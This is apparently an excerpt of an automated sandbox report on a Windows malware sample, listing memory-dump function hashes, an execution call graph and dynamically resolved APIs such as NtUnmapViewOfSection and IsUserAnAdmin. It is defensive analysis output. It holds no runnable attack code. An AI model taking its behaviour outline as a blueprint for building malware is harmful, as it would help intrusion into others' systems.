                                    • Source File: 00000008.00000002.2239576446.0000000000C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C8D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_c8d000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1b04255b040f5a90cbaff7733267a02cac73c1eb8a5e5627ef973d0c054c5d67
                                    • Instruction ID: f5e4edb2fffcdf6f3fcf9d67a2ddb05709468e4c79cf70228f5e36ed8ed29e77
                                    • Opcode Fuzzy Hash: 1b04255b040f5a90cbaff7733267a02cac73c1eb8a5e5627ef973d0c054c5d67
                                    • Instruction Fuzzy Hash: 1721F871504204DFDB05EF14D9C0F16BF65FBD8328F24C569E90A0B296C33AE856DBA6
                                    Function 00C9D01C Relevance: .1, Instructions: 72COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2239612303.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_c9d000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fa583432b5d6ae80da8624e5b1e2c03cfff079f0849f9b79df793f95a4ae34fa
                                    • Instruction ID: 0984c8994fbe04250b3bd5c974b99e2156505021cb9c6880468e5a34e9e76afa
                                    • Opcode Fuzzy Hash: fa583432b5d6ae80da8624e5b1e2c03cfff079f0849f9b79df793f95a4ae34fa
                                    • Instruction Fuzzy Hash: CA21F271604304DFDF14DF24D9C8B26BF65FB88314F20C569E94A5B296C33AD807CA62
                                    Function 00C9D1D4 Relevance: .1, Instructions: 72COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2239612303.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_c9d000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 60db3d03ac7a9a002bf02bfaa9881438f5da3835075ccf1492d28f36d6d5c5ca
                                    • Instruction ID: 1c14fce52d4e3abad5713944dab0edc3aaf6a6d53538de410579df9ec8cab224
                                    • Opcode Fuzzy Hash: 60db3d03ac7a9a002bf02bfaa9881438f5da3835075ccf1492d28f36d6d5c5ca
                                    • Instruction Fuzzy Hash: 33210471504604EFDF05DF24D9C8F26BBA5FB88314F20C5ADE90A5B296C33ADC46CA61
                                    Function 00C9D005 Relevance: .1, Instructions: 62COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2239612303.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_c9d000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1ac37fd7ac31f8d9e6393bc0e9bf35dd76d0614adc882c457eacd0abb49ef68b
                                    • Instruction ID: b606ca886fb1a9ba05fe618b913b2fdf18eaea1de4ceaeff5162834f102f7854
                                    • Opcode Fuzzy Hash: 1ac37fd7ac31f8d9e6393bc0e9bf35dd76d0614adc882c457eacd0abb49ef68b
                                    • Instruction Fuzzy Hash: AC216F755093C08FDB12CF24D994715BF71EB46314F28C5EAD84A8F6A7C33A990ACB62
                                    Function 00C8D3D3 Relevance: .1, Instructions: 56COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2239576446.0000000000C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C8D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_c8d000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                    • Instruction ID: 36ea47e0fd73a422ab6f8a856b48fa62100f4b0314869ffaf638e05bf5af42b1
                                    • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                    • Instruction Fuzzy Hash: 35110372404240DFCB02DF00D5C4B16BF71FB94324F24C6A9D90A0B256C33AE95ACBA2
                                    Function 00C9D1CF Relevance: .1, Instructions: 53COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2239612303.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_c9d000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                    • Instruction ID: fa4ec3752ff8554c8bb509d2fac82fd512cb63882f10ee6b03cef26767fb57c7
                                    • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                    • Instruction Fuzzy Hash: 8D11BB75504680DFCB02CF10C5C8B15BBA1FB84314F24C6A9D84A4B296C33AD84ACB62
                                    Function 00C8D745 Relevance: .0, Instructions: 45COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2239576446.0000000000C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C8D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_c8d000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 71da5c66e016856a74a0d071f89cdd0b188659c1e6f7d48978a4cad823eb4095
                                    • Instruction ID: e23458900d41512578b2fc85f1598ab0263dbefe02410a9d753673f1bc90fe3b
                                    • Opcode Fuzzy Hash: 71da5c66e016856a74a0d071f89cdd0b188659c1e6f7d48978a4cad823eb4095
                                    • Instruction Fuzzy Hash: A701207100434499D7106E16CD84B57BF9CDF46328F14C569ED1A4A2CAD2799C40CB79
                                    Function 00C8D744 Relevance: .0, Instructions: 36COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2239576446.0000000000C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C8D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_c8d000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 44f02a2a69e6266b9d65f9a21f1242745a5ed4921a0a22b9236e3c6f6af0d86a
                                    • Instruction ID: 75378af0222434888439f45d9312601e3753ed2de13ceb4ca3b0dfc513148620
                                    • Opcode Fuzzy Hash: 44f02a2a69e6266b9d65f9a21f1242745a5ed4921a0a22b9236e3c6f6af0d86a
                                    • Instruction Fuzzy Hash: D9F0F671004344AEE7109E16CC88B62FF98EF56334F18C45AED094B2CAC3799C44CBB4

                                    Execution Graph

                                    Execution Coverage:1.1%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:4.6%
                                    Total number of Nodes:517
                                    Total number of Limit Nodes:9
                                    execution_graph 47135 404e26 WaitForSingleObject 47136 404e40 SetEvent CloseHandle 47135->47136 47137 404e57 closesocket 47135->47137 47138 404ed8 47136->47138 47139 404e64 47137->47139 47140 404e7a 47139->47140 47148 4050e4 83 API calls 47139->47148 47141 404e8c WaitForSingleObject 47140->47141 47142 404ece SetEvent CloseHandle 47140->47142 47149 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47141->47149 47142->47138 47145 404e9b SetEvent WaitForSingleObject 47150 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47145->47150 47147 404eb3 SetEvent CloseHandle CloseHandle 47147->47142 47148->47140 47149->47145 47150->47147 47151 434918 47152 434924 ___FrameUnwindToState 47151->47152 47177 434627 47152->47177 47154 43492b 47156 434954 47154->47156 47472 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 47154->47472 47157 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 47156->47157 47473 4442d2 5 API calls _ValidateLocalCookies 47156->47473 47162 4349f3 47157->47162 47475 443487 35 API calls 5 library calls 47157->47475 47159 43496d 47161 434973 ___FrameUnwindToState 47159->47161 47474 444276 5 API calls _ValidateLocalCookies 47159->47474 47188 434ba5 47162->47188 47172 434a1f 47174 434a28 47172->47174 47476 443462 28 API calls _abort 47172->47476 47477 43479e 13 API calls 2 library calls 47174->47477 47178 434630 47177->47178 47478 434cb6 IsProcessorFeaturePresent 47178->47478 47180 43463c 47479 438fb1 10 API calls 4 library calls 47180->47479 47182 434641 47183 434645 47182->47183 47480 44415f IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47182->47480 47183->47154 47185 43464e 47186 43465c 47185->47186 47481 438fda 8 API calls 3 library calls 47185->47481 47186->47154 47482 436f10 47188->47482 47191 4349f9 47192 444223 47191->47192 47484 44f0d9 47192->47484 47194 434a02 47197 40ea00 47194->47197 47195 44422c 47195->47194 47488 446895 35 API calls 47195->47488 47490 41cbe1 LoadLibraryA GetProcAddress 47197->47490 47199 40ea1c GetModuleFileNameW 47495 40f3fe 47199->47495 47201 40ea38 47510 4020f6 47201->47510 47204 4020f6 28 API calls 47205 40ea56 47204->47205 47516 41beac 47205->47516 47209 40ea68 47542 401e8d 47209->47542 47211 40ea71 47212 40ea84 47211->47212 47213 40eace 47211->47213 47572 40fbee 116 API calls 47212->47572 47548 401e65 22 API calls 47213->47548 47216 40eade 47549 401e65 22 API calls 47216->47549 47217 40ea96 47573 401e65 22 API calls 47217->47573 47219 40eaa2 47574 410f72 36 API calls __EH_prolog 47219->47574 47221 40eafd 47550 40531e 28 API calls 47221->47550 47224 40eab4 47575 40fb9f 77 API calls 47224->47575 47225 40eb0c 47551 406383 28 API calls 47225->47551 47228 40eb18 47552 401fe2 47228->47552 47229 40eabd 47576 40f3eb 70 API calls 47229->47576 47235 401fd8 11 API calls 47237 40ef36 47235->47237 47236 401fd8 11 API calls 47238 40eb36 47236->47238 47467 443396 GetModuleHandleW 47237->47467 47564 401e65 22 API calls 47238->47564 47240 40eb3f 47565 401fc0 28 API calls 47240->47565 47242 40eb4a 47566 401e65 22 API calls 47242->47566 47244 40eb63 47567 401e65 22 API calls 47244->47567 47246 40eb7e 47247 40ebe9 47246->47247 47577 406c59 28 API calls 47246->47577 47568 401e65 22 API calls 47247->47568 47250 40ebab 47251 401fe2 28 API calls 47250->47251 47252 40ebb7 47251->47252 47255 401fd8 11 API calls 47252->47255 47253 40ebf6 47254 40ec3d 47253->47254 47579 413584 RegOpenKeyExA RegQueryValueExA RegCloseKey 47253->47579 47569 40d0a4 47254->47569 47257 40ebc0 47255->47257 47578 413584 RegOpenKeyExA RegQueryValueExA RegCloseKey 47257->47578 47258 40ec43 47259 40eac6 47258->47259 47581 41b354 33 API calls 47258->47581 47259->47235 47263 40ebdf 47263->47247 47264 40f38a 47263->47264 47664 4139e4 30 API calls 47264->47664 47265 40ec5e 47267 40ecb1 47265->47267 47582 407751 RegOpenKeyExA RegQueryValueExA RegCloseKey 47265->47582 47266 40ec21 47266->47254 47580 4139e4 30 API calls 47266->47580 47587 401e65 22 API calls 47267->47587 47272 40f3a0 47665 4124b0 65 API calls ___scrt_get_show_window_mode 47272->47665 47273 40ecba 47280 40ecc6 47273->47280 47281 40eccb 47273->47281 47274 40ec79 47275 40ec87 47274->47275 47276 40ec7d 47274->47276 47585 401e65 22 API calls 47275->47585 47583 407773 30 API calls 47276->47583 47588 407790 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 47280->47588 47589 401e65 22 API calls 47281->47589 47282 40ec82 47584 40729b 97 API calls 47282->47584 47287 40f3ba 47667 413a5e RegOpenKeyExW RegDeleteValueW 47287->47667 47288 40ecd4 47590 41bcef 28 API calls 47288->47590 47290 40ec90 47290->47267 47294 40ecac 47290->47294 47291 40ecdf 47591 401f13 28 API calls 47291->47591 47586 40729b 97 API calls 47294->47586 47295 40f3cd 47668 401f09 11 API calls 47295->47668 47296 40ecea 47592 401f09 11 API calls 47296->47592 47300 40f3d7 47669 401f09 11 API calls 47300->47669 47302 40ecf3 47593 401e65 22 API calls 47302->47593 47303 40f3e0 47670 40dd7d 27 API calls 47303->47670 47306 40ecfc 47594 401e65 22 API calls 47306->47594 47307 40f3e5 47671 414f65 167 API calls _strftime 47307->47671 47311 40ed16 47595 401e65 22 API calls 47311->47595 47313 40ed30 47596 401e65 22 API calls 47313->47596 47315 40ed49 47316 40edbb 47315->47316 47597 401e65 22 API calls 47315->47597 47317 40edc5 47316->47317 47324 40ef41 ___scrt_get_show_window_mode 47316->47324 47319 40edce 47317->47319 47325 40ee4a 47317->47325 47603 401e65 22 API calls 47319->47603 47321 40edd7 47604 401e65 22 API calls 47321->47604 47322 40ed5e _wcslen 47322->47316 47598 401e65 22 API calls 47322->47598 47614 413733 RegOpenKeyExA RegQueryValueExA RegCloseKey 47324->47614 47349 40ee45 ___scrt_get_show_window_mode 47325->47349 47327 40ede9 47605 401e65 22 API calls 47327->47605 47328 40ed79 47599 401e65 22 API calls 47328->47599 47332 40edfb 47606 401e65 22 API calls 47332->47606 47333 40ed8e 47600 40da6f 31 API calls 47333->47600 47334 40ef8c 47615 401e65 22 API calls 47334->47615 47337 40ee24 47607 401e65 22 API calls 47337->47607 47338 40efb1 47616 402093 28 API calls 47338->47616 47340 40eda1 47601 401f13 28 API calls 47340->47601 47342 40edad 47602 401f09 11 API calls 47342->47602 47346 40ee35 47608 40ce34 45 API calls _wcslen 47346->47608 47347 40efc3 47617 4137aa 14 API calls 47347->47617 47348 40edb6 47348->47316 47349->47325 47609 413982 31 API calls 47349->47609 47353 40eede ctype 47610 401e65 22 API calls 47353->47610 47354 40efd9 47618 401e65 22 API calls 47354->47618 47356 40efe5 47619 43bb2c 39 API calls _strftime 47356->47619 47359 40eff2 47361 40f01f 47359->47361 47620 41ce2c 86 API calls ___scrt_get_show_window_mode 47359->47620 47360 40eef5 47360->47334 47611 401e65 22 API calls 47360->47611 47621 402093 28 API calls 47361->47621 47364 40ef12 47612 41bcef 28 API calls 47364->47612 47365 40f003 CreateThread 47365->47361 47779 41d4ee 10 API calls 47365->47779 47368 40ef1e 47613 40f4af 103 API calls 47368->47613 47369 40f034 47622 402093 28 API calls 47369->47622 47372 40f043 47623 41b580 79 API calls 47372->47623 47373 40ef23 47373->47334 47375 40ef2a 47373->47375 47375->47259 47376 40f048 47624 401e65 22 API calls 47376->47624 47378 40f054 47625 401e65 22 API calls 47378->47625 47380 40f066 47626 401e65 22 API calls 47380->47626 47382 40f086 47627 43bb2c 39 API calls _strftime 47382->47627 47384 40f093 47628 401e65 22 API calls 47384->47628 47386 40f09e 47629 401e65 22 API calls 47386->47629 47388 40f0af 47630 401e65 22 API calls 47388->47630 47390 40f0c4 47631 401e65 22 API calls 47390->47631 47392 40f0d5 47393 40f0dc StrToIntA 47392->47393 47632 409e1f 169 API calls _wcslen 47393->47632 47395 40f0ee 47633 401e65 22 API calls 47395->47633 47397 40f0f7 47398 40f13c 47397->47398 47634 43455e 47397->47634 47642 401e65 22 API calls 47398->47642 47403 40f11f 47406 40f126 CreateThread 47403->47406 47404 40f194 47644 401e65 22 API calls 47404->47644 47405 40f14c 47405->47404 47407 43455e new 22 API calls 47405->47407 47406->47398 47783 41a045 102 API calls 2 library calls 47406->47783 47409 40f161 47407->47409 47643 401e65 22 API calls 47409->47643 47411 40f173 47416 40f17a CreateThread 47411->47416 47412 40f207 47650 401e65 22 API calls 47412->47650 47413 40f19d 47413->47412 47645 401e65 22 API calls 47413->47645 47416->47404 47780 41a045 102 API calls 2 library calls 47416->47780 47417 40f1b9 47646 401e65 22 API calls 47417->47646 47418 40f255 47655 41b69e 79 API calls 47418->47655 47419 40f210 47419->47418 47651 401e65 22 API calls 47419->47651 47423 40f1ce 47647 40da23 31 API calls 47423->47647 47424 40f25e 47656 401f13 28 API calls 47424->47656 47425 40f225 47652 401e65 22 API calls 47425->47652 47427 40f269 47657 401f09 11 API calls 47427->47657 47431 40f1e1 47648 401f13 28 API calls 47431->47648 47432 40f272 CreateThread 47437 40f293 CreateThread 47432->47437 47438 40f29f 47432->47438 47781 40f7e2 120 API calls 47432->47781 47433 40f23a 47653 43bb2c 39 API calls _strftime 47433->47653 47436 40f1ed 47649 401f09 11 API calls 47436->47649 47437->47438 47782 412132 137 API calls 47437->47782 47440 40f2b4 47438->47440 47441 40f2a8 CreateThread 47438->47441 47445 40f307 47440->47445 47658 402093 28 API calls 47440->47658 47441->47440 47777 412716 38 API calls ___scrt_get_show_window_mode 47441->47777 47443 40f1f6 CreateThread 47443->47412 47778 401be9 49 API calls _strftime 47443->47778 47444 40f247 47654 40c19d 7 API calls 47444->47654 47660 41353a RegOpenKeyExA RegQueryValueExA RegCloseKey 47445->47660 47448 40f2d7 47659 4052fd 28 API calls 47448->47659 47451 40f31f 47451->47303 47661 41bcef 28 API calls 47451->47661 47456 40f338 47662 413656 31 API calls 47456->47662 47461 40f34e 47663 401f09 11 API calls 47461->47663 47463 40f381 DeleteFileW 47464 40f388 47463->47464 47465 40f359 47463->47465 47666 41bcef 28 API calls 47464->47666 47465->47463 47465->47464 47466 40f36f Sleep 47465->47466 47466->47465 47468 434a15 47467->47468 47468->47172 47469 4434bf 47468->47469 47785 44323c 47469->47785 47472->47154 47473->47159 47474->47157 47475->47162 47476->47174 47477->47161 47478->47180 47479->47182 47480->47185 47481->47183 47483 434bb8 GetStartupInfoW 47482->47483 47483->47191 47485 44f0eb 47484->47485 47486 44f0e2 47484->47486 47485->47195 47489 44efd8 48 API calls 5 library calls 47486->47489 47488->47195 47489->47485 47491 41cc20 LoadLibraryA GetProcAddress 47490->47491 47492 41cc10 GetModuleHandleA GetProcAddress 47490->47492 47493 41cc49 44 API calls 47491->47493 47494 41cc39 LoadLibraryA GetProcAddress 47491->47494 47492->47491 47493->47199 47494->47493 47672 41b539 FindResourceA 47495->47672 47499 40f428 ctype 47682 4020b7 47499->47682 47502 401fe2 28 API calls 47503 40f44e 47502->47503 47504 401fd8 11 API calls 47503->47504 47505 40f457 47504->47505 47506 43bda0 new 21 API calls 47505->47506 47507 40f468 ctype 47506->47507 47688 406e13 47507->47688 47509 40f49b 47509->47201 47511 40210c 47510->47511 47512 4023ce 11 API calls 47511->47512 47513 402126 47512->47513 47514 402569 28 API calls 47513->47514 47515 402134 47514->47515 47515->47204 47725 4020df 47516->47725 47518 41bf2f 47519 401fd8 11 API calls 47518->47519 47520 41bf61 47519->47520 47522 401fd8 11 API calls 47520->47522 47521 41bf31 47741 4041a2 28 API calls 47521->47741 47525 41bf69 47522->47525 47526 401fd8 11 API calls 47525->47526 47528 40ea5f 47526->47528 47527 41bf3d 47529 401fe2 28 API calls 47527->47529 47538 40fb52 47528->47538 47531 41bf46 47529->47531 47530 401fe2 28 API calls 47537 41bebf 47530->47537 47532 401fd8 11 API calls 47531->47532 47534 41bf4e 47532->47534 47533 401fd8 11 API calls 47533->47537 47535 41cec5 28 API calls 47534->47535 47535->47518 47537->47518 47537->47521 47537->47530 47537->47533 47729 4041a2 28 API calls 47537->47729 47730 41cec5 47537->47730 47539 40fb5e 47538->47539 47541 40fb65 47538->47541 47767 402163 11 API calls 47539->47767 47541->47209 47543 402163 47542->47543 47544 40219f 47543->47544 47768 402730 11 API calls 47543->47768 47544->47211 47546 402184 47769 402712 11 API calls std::_Deallocate 47546->47769 47548->47216 47549->47221 47550->47225 47551->47228 47553 401ff1 47552->47553 47560 402039 47552->47560 47554 4023ce 11 API calls 47553->47554 47555 401ffa 47554->47555 47556 40203c 47555->47556 47557 402015 47555->47557 47771 40267a 11 API calls 47556->47771 47770 403098 28 API calls 47557->47770 47561 401fd8 47560->47561 47562 4023ce 11 API calls 47561->47562 47563 401fe1 47562->47563 47563->47236 47564->47240 47565->47242 47566->47244 47567->47246 47568->47253 47772 401fab 47569->47772 47571 40d0ae CreateMutexA GetLastError 47571->47258 47572->47217 47573->47219 47574->47224 47575->47229 47577->47250 47578->47263 47579->47266 47580->47254 47581->47265 47582->47274 47583->47282 47584->47275 47585->47290 47586->47267 47587->47273 47588->47281 47589->47288 47590->47291 47591->47296 47592->47302 47593->47306 47594->47311 47595->47313 47596->47315 47597->47322 47598->47328 47599->47333 47600->47340 47601->47342 47602->47348 47603->47321 47604->47327 47605->47332 47606->47337 47607->47346 47608->47349 47609->47353 47610->47360 47611->47364 47612->47368 47613->47373 47614->47334 47615->47338 47616->47347 47617->47354 47618->47356 47619->47359 47620->47365 47621->47369 47622->47372 47623->47376 47624->47378 47625->47380 47626->47382 47627->47384 47628->47386 47629->47388 47630->47390 47631->47392 47632->47395 47633->47397 47638 434563 47634->47638 47635 43bda0 new 21 API calls 47635->47638 47636 40f10c 47641 401e65 22 API calls 47636->47641 47638->47635 47638->47636 47773 443001 7 API calls 2 library calls 47638->47773 47774 434c99 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47638->47774 47775 4352fb RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47638->47775 47641->47403 47642->47405 47643->47411 47644->47413 47645->47417 47646->47423 47647->47431 47648->47436 47649->47443 47650->47419 47651->47425 47652->47433 47653->47444 47654->47418 47655->47424 47656->47427 47657->47432 47658->47448 47660->47451 47661->47456 47662->47461 47663->47465 47664->47272 47666->47287 47667->47295 47668->47300 47669->47303 47670->47307 47776 41ada8 104 API calls 47671->47776 47673 41b556 LoadResource LockResource SizeofResource 47672->47673 47674 40f419 47672->47674 47673->47674 47675 43bda0 47674->47675 47681 4461b8 __Getctype 47675->47681 47676 4461f6 47692 44062d 20 API calls __dosmaperr 47676->47692 47678 4461e1 RtlAllocateHeap 47679 4461f4 47678->47679 47678->47681 47679->47499 47681->47676 47681->47678 47691 443001 7 API calls 2 library calls 47681->47691 47683 4020bf 47682->47683 47693 4023ce 47683->47693 47685 4020ca 47697 40250a 47685->47697 47687 4020d9 47687->47502 47689 4020b7 28 API calls 47688->47689 47690 406e27 47689->47690 47690->47509 47691->47681 47692->47679 47694 402428 47693->47694 47695 4023d8 47693->47695 47694->47685 47695->47694 47704 4027a7 11 API calls std::_Deallocate 47695->47704 47698 40251a 47697->47698 47699 402520 47698->47699 47700 402535 47698->47700 47705 402569 47699->47705 47715 4028e8 28 API calls 47700->47715 47703 402533 47703->47687 47704->47694 47716 402888 47705->47716 47707 40257d 47708 402592 47707->47708 47709 4025a7 47707->47709 47721 402a34 22 API calls 47708->47721 47723 4028e8 28 API calls 47709->47723 47712 40259b 47722 4029da 22 API calls 47712->47722 47714 4025a5 47714->47703 47715->47703 47717 402890 47716->47717 47718 402898 47717->47718 47724 402ca3 22 API calls 47717->47724 47718->47707 47721->47712 47722->47714 47723->47714 47726 4020e7 47725->47726 47727 4023ce 11 API calls 47726->47727 47728 4020f2 47727->47728 47728->47537 47729->47537 47731 41ced2 47730->47731 47732 41cf31 47731->47732 47736 41cee2 47731->47736 47733 41cf4b 47732->47733 47734 41d071 28 API calls 47732->47734 47751 41d1d7 28 API calls 47733->47751 47734->47733 47737 41cf1a 47736->47737 47742 41d071 47736->47742 47750 41d1d7 28 API calls 47737->47750 47738 41cf2d 47738->47537 47741->47527 47744 41d079 47742->47744 47743 41d0ab 47743->47737 47744->47743 47745 41d0af 47744->47745 47748 41d093 47744->47748 47762 402725 22 API calls 47745->47762 47752 41d0e2 47748->47752 47750->47738 47751->47738 47753 41d0ec __EH_prolog 47752->47753 47763 402717 22 API calls 47753->47763 47755 41d0ff 47764 41d1ee 11 API calls 47755->47764 47757 41d125 47758 41d15d 47757->47758 47765 402730 11 API calls 47757->47765 47758->47743 47760 41d144 47766 402712 11 API calls std::_Deallocate 47760->47766 47763->47755 47764->47757 47765->47760 47766->47758 47767->47541 47768->47546 47769->47544 47770->47560 47771->47560 47773->47638 47784 412829 61 API calls 47782->47784 47786 443248 CallUnexpected 47785->47786 47787 443396 _abort GetModuleHandleW 47786->47787 47795 443260 47786->47795 47789 443254 47787->47789 47789->47795 47819 4433da GetModuleHandleExW 47789->47819 47790 443268 47794 4432dd 47790->47794 47806 443306 47790->47806 47827 443ff0 20 API calls _abort 47790->47827 47798 4432f5 47794->47798 47828 444276 5 API calls _ValidateLocalCookies 47794->47828 47807 445909 EnterCriticalSection 47795->47807 47796 443323 47811 443355 47796->47811 47797 44334f 47830 4577a9 5 API calls _ValidateLocalCookies 47797->47830 47829 444276 5 API calls _ValidateLocalCookies 47798->47829 47808 443346 47806->47808 47807->47790 47831 445951 LeaveCriticalSection 47808->47831 47810 44331f 47810->47796 47810->47797 47832 448d49 47811->47832 47814 443383 47817 4433da _abort 8 API calls 47814->47817 47815 443363 GetPEB 47815->47814 47816 443373 GetCurrentProcess TerminateProcess 47815->47816 47816->47814 47818 44338b ExitProcess 47817->47818 47820 443404 GetProcAddress 47819->47820 47821 443427 47819->47821 47822 443419 47820->47822 47823 443436 47821->47823 47824 44342d FreeLibrary 47821->47824 47822->47821 47825 43502b _ValidateLocalCookies 5 API calls 47823->47825 47824->47823 47826 443440 47825->47826 47826->47795 47827->47794 47828->47798 47829->47806 47831->47810 47833 448d6e 47832->47833 47837 448d64 47832->47837 47838 44854a 47833->47838 47836 44335f 47836->47814 47836->47815 47845 43502b 47837->47845 47839 448576 47838->47839 47840 44857a 47838->47840 47839->47840 47844 44859a 47839->47844 47852 4485e6 47839->47852 47840->47837 47842 4485a6 GetProcAddress 47843 4485b6 __crt_fast_encode_pointer 47842->47843 47843->47840 47844->47840 47844->47842 47846 435036 IsProcessorFeaturePresent 47845->47846 47847 435034 47845->47847 47849 435078 47846->47849 47847->47836 47859 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47849->47859 47851 43515b 47851->47836 47853 448607 LoadLibraryExW 47852->47853 47854 4485fc 47852->47854 47855 448624 GetLastError 47853->47855 47857 44863c 47853->47857 47854->47839 47855->47857 47858 44862f LoadLibraryExW 47855->47858 47856 448653 FreeLibrary 47856->47854 47857->47854 47857->47856 47858->47857 47859->47851 47860 40165e 47861 401666 47860->47861 47862 401669 47860->47862 47863 4016a8 47862->47863 47865 401696 47862->47865 47864 43455e new 22 API calls 47863->47864 47867 40169c 47864->47867 47866 43455e new 22 API calls 47865->47866 47866->47867

                                    Executed Functions

                                    Function 0041CBE1 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                    • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                    • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                    • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                    • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                    • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                    • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                    • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                    • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                    • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                    • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                    • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD06
